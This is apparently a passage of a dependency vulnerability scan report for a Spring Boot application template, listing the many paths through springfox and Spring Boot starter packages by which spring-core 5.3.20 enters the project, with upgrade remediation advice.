  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
